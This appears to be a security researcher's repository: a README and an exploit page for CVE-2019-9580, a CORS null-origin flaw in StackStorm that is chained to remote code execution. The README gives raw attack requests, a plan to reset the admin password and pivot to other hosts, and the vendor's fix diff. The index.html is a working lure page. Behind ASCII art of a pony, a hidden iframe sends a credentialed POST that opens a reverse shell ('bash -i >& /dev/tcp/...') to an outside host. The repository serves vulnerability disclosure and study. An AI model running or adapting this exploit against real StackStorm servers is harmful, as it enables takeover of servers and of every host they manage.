├── README.md
└── index.html


/README.md:
--------------------------------------------------------------------------------
  1 | # CVE-2019-9580 - StackStorm exploiting CORS null origin to gain RCE < 2.9.3 and 2.10.3
  2 | 
  3 | > Prior to 2.10.3/2.9.3, if the origin of the request was unknown, we would return null.  null can result in a successful request from an unknown origin in some clients. Allowing the possibility of XSS style attacks against the StackStorm API.
  4 | 
  5 | found by [Barak Tawily](https://github.com/Quitten) and [Anna Tsibulskaya](https://github.com/anna-wix)
  6 | 
  7 | ![Peek 13-03-2019 17-16](https://user-images.githubusercontent.com/5891788/54295917-39f07300-45b4-11e9-8387-63ed2b64878e.gif)
  8 | _(user on Firefox is the victim, user on Chrome is the attacker)_
  9 | 
 10 | ### Proof of Concept
 11 | 
 12 | 
 13 | #### Exploiting null CORS
 14 | By sending a request to the StackStorm API with an null Origin header `Origin: null`, the server responds with an `Access-Control-Allow-Origin` to `null`.
 15 | 
 16 | ```
 17 | GET /api/v1/executions?action=packs.get_config&limit=5&exclude_attributes=trigger_instance&parent=null HTTP/1.1
 18 | Host: localhost:4443
 19 | Origin: 443
 20 | Referer: https://localhost:4443/
 21 | x-auth-token: a19e39b9dff24e4798ba04c7036d0275
 22 | ```
 23 | 
 24 | Server response:
 25 | ```
 26 | Access-Control-Allow-Origin: null <-- hug hug hug
 27 | Access-Control-Allow-Methods: GET,POST,PUT,DELETE,OPTIONS
 28 | Access-Control-Allow-Headers: Content-Type,Authorization,X-Auth-Token,St2-Api-Key,X-Request-ID
 29 | Access-Control-Allow-Credentials: true
 30 | Access-Control-Expose-Headers: Content-Type,X-Limit,X-Total-Count,X-Request-ID
 31 | ```
 32 | 
 33 | Exploiting null CORS is documented on a [blogpost from portswigger](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) and we can found the following payload:
 34 | ```javascript
 35 | <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,
 36 | <script>
 37 | 
 38 | *inject your malicous code*
 39 | 
 40 | </script>’></iframe>
 41 | ```
 42 | 
 43 | #### But what about the RCE ?
 44 | 
 45 | StackStorm allows you to configure **actions** and some of them like `core.remote` execute arbitrary command on the host of your choice.
 46 | 
 47 | ![image](https://user-images.githubusercontent.com/5891788/54306352-7aa6b700-45c9-11e9-988c-726b150c9303.png)
 48 | 
 49 | So if we put host **127.0.0.1**, we will execute command on the StackStorm docker. Nice, RCE should be OK since a simple POST request is send to register an **action**.
 50 | 
 51 | ```
 52 | POST /api/v1/executions HTTP/1.1
 53 | Host: localhost:4443
 54 | Origin: null
 55 | Content-Type: application/json
 56 | x-auth-token: a19e39b9dff24e4798ba04c7036d0275
 57 | Content-Length: 131
 58 | 
 59 | {"action":"core.remote","parameters":{"cmd":"touch /tmp/pwn2.txt","hosts":"127.0.0.1","cwd":"/tmp"},"context":{"trace_context":{}}}
 60 | ```
 61 | 
 62 | #### What next ?
 63 | 
 64 | We can execute command on the host of StackStorm okay, but let's gain full control over StackStorm plateform. This can be down by reseting the password of the administrator. Using the documention:
 65 | 
 66 | > Need to change the password? Run: sudo htpasswd /etc/st2/htpasswd st2admin.
 67 | https://docs.stackstorm.com/authentication.html
 68 | 
 69 | Nice, let's just put all together :
 70 | 1. Send a link to the victim with malicous payload that register a new **action** on the host 127.0.0.1 to exec an arbirary command
 71 | 2. The victim clicks on the link and view the pony
 72 | 3. Since CORS is null when a request is sent with header `Origin: null`, the POST request to register the new action is working (we also set the parameter `credentials: "include"`)
 73 | 4. The action is trigger and command executed (reverse shell)
 74 | 5. Attacker resets the password of the administrator and gain full control over StackStorm platform
 75 | 6. Attacker can corrupt all the other host registered into StackStorm
 76 | 
 77 | ![capture d'écran_1](https://user-images.githubusercontent.com/5891788/54295923-3d83fa00-45b4-11e9-82c5-faec2d5b2456.png)
 78 | 
 79 | **Security Advisory**: 
 80 | - https://stackstorm.com/2019/03/08/stackstorm-2-9-3-2-10-3/
 81 | - https://github.com/StackStorm/st2/pull/4577/commits/66605b7b202b8bd2db1ccd8c1ce7279028ac86d4
 82 | 
 83 | ```diff
 84 | From 66605b7b202b8bd2db1ccd8c1ce7279028ac86d4 Mon Sep 17 00:00:00 2001
 85 | From: bigmstone <matthew99@gmail.com>
 86 | Date: Tue, 5 Mar 2019 12:22:26 -0600
 87 | Subject: [PATCH] Fix improper CORS return
 88 | 
 89 | Prior to this commit if you sent a request from an origin not listed in
 90 | `allowed_origins` we would respond with `null` for the
 91 | `Access-Control-Allow-Origin` header. Per
 92 | [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin#Directives](mozilla's documentation)
 93 | null should not be used as some clients will allow the request to go
 94 | through. This commit returns the first of our allowed origins if the
 95 | requesting origin is not a supported origin.
 96 | ---
 97 |  st2api/tests/unit/controllers/v1/test_base.py | 4 ++--
 98 |  st2common/st2common/middleware/cors.py        | 2 +-
 99 |  2 files changed, 3 insertions(+), 3 deletions(-)
100 | 
101 | diff --git a/st2api/tests/unit/controllers/v1/test_base.py b/st2api/tests/unit/controllers/v1/test_base.py
102 | index 2a753f22ea..e66148a0a5 100644
103 | --- a/st2api/tests/unit/controllers/v1/test_base.py
104 | +++ b/st2api/tests/unit/controllers/v1/test_base.py
105 | @@ -51,8 +51,8 @@ def test_wrong_origin(self):
106 |              'origin': 'http://xss'
107 |          })
108 |          self.assertEqual(response.status_int, 200)
109 | -        self.assertEqual(response.headers['Access-Control-Allow-Origin'],
110 | -                         'null')
111 | +        self.assertEqual(response.headers.get('Access-Control-Allow-Origin'),
112 | +                        'http://127.0.0.1:3000')
113 |  
114 |      def test_wildcard_origin(self):
115 |          try:
116 | diff --git a/st2common/st2common/middleware/cors.py b/st2common/st2common/middleware/cors.py
117 | index 5781b1a6e7..8cb407b52c 100644
118 | --- a/st2common/st2common/middleware/cors.py
119 | +++ b/st2common/st2common/middleware/cors.py
120 | @@ -66,7 +66,7 @@ def custom_start_response(status, headers, exc_info=None):
121 |                      origin_allowed = origin
122 |                  else:
123 |                      # See http://www.w3.org/TR/cors/#access-control-allow-origin-response-header
124 | -                    origin_allowed = origin if origin in origins else 'null'
125 | +                    origin_allowed = origin if origin in origins else list(origins)[0]
126 |              else:
127 |                  origin_allowed = list(origins)[0]
128 | ```
129 | 
130 | ### Ressources:
131 | 
132 | * https://stackstorm.com/2019/03/08/stackstorm-2-9-3-2-10-3/
133 | * https://quitten.github.io/StackStorm/
134 | 
135 | 


--------------------------------------------------------------------------------
/index.html:
--------------------------------------------------------------------------------
 1 | <pre>
 2 |       ,;;*;;;;,
 3 |      .-'``;-');;.
 4 |     /'  .-.  /*;;
 5 |   .'    \d    \;;               .;;;,
 6 |  / o      `    \;    ,__.     ,;*;;;*;,
 7 |  \__, _.__,'   \_.-') __)--.;;;;;*;;;;,
 8 |   `""`;;;\       /-')_) __)  `\' ';;;;;;
 9 |      ;*;;;        -') `)_)  |\ |  ;;;;*;
10 |      ;;;;|        `---`    O | | ;;*;;;
11 |      *;*;\|                 O  / ;;;;;*
12 |     ;;;;;/|    .-------\      / ;*;;;;;
13 |    ;;;*;/ \    |        '.   (`. ;;;*;;;
14 |    ;;;;;'. ;   |          )   \ | ;;;;;;
15 |    ,;*;;;;\/   |.        /   /` | ';;;*;
16 |     ;;;;;;/    |/       /   /__/   ';;;
17 |     '"*"'/     |       /    |      ;*;
18 |          `""""`        `""""`     ;'
19 | </pre>
20 | <!-- from https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties -->
21 | <iframe style="visibility: hidden;" sandbox="allow-scripts allow-top-navigation allow-forms" 
22 | src='data:text/html,<script>
23 | 
24 |     function status(response) {
25 |         if (response.status >= 200 && response.status < 300) { return Promise.resolve(response) } 
26 |         else { return Promise.reject(new Error(response.statusText)) } 
27 |     };
28 |         
29 |     function json(response) { return response.json() };
30 | 
31 |     console.log(1);
32 |     var myHeaders = new Headers();
33 |     myHeaders.append("Content-Type", "application/json");
34 |     myHeaders.append("Origin", "null");
35 |     var myInit = { 
36 |         credentials: "include",
37 |         method: "POST",
38 |         headers: myHeaders,
39 |         body: "{\"action\":\"core.remote\",\"parameters\":{\"cmd\":\"bash -i >& /dev/tcp/172.28.0.1/1337 0>&1\",\"hosts\":\"127.0.0.1\",\"cwd\":\"/tmp\"},\"context\":{\"trace_context\":{}}}"        
40 |     };
41 | 
42 |     fetch("https://localhost:4443/api/v1/executions", myInit)
43 |     .then(status)
44 |     .then(json)
45 |     .then(function(data) {
46 |         console.log("Request succeeded with JSON response", data);
47 |     }).catch(function(error) {
48 |         console.log("Request failed", error);
49 |     });
50 |     console.log(3)
51 | </script>'></iframe>
52 | 


--------------------------------------------------------------------------------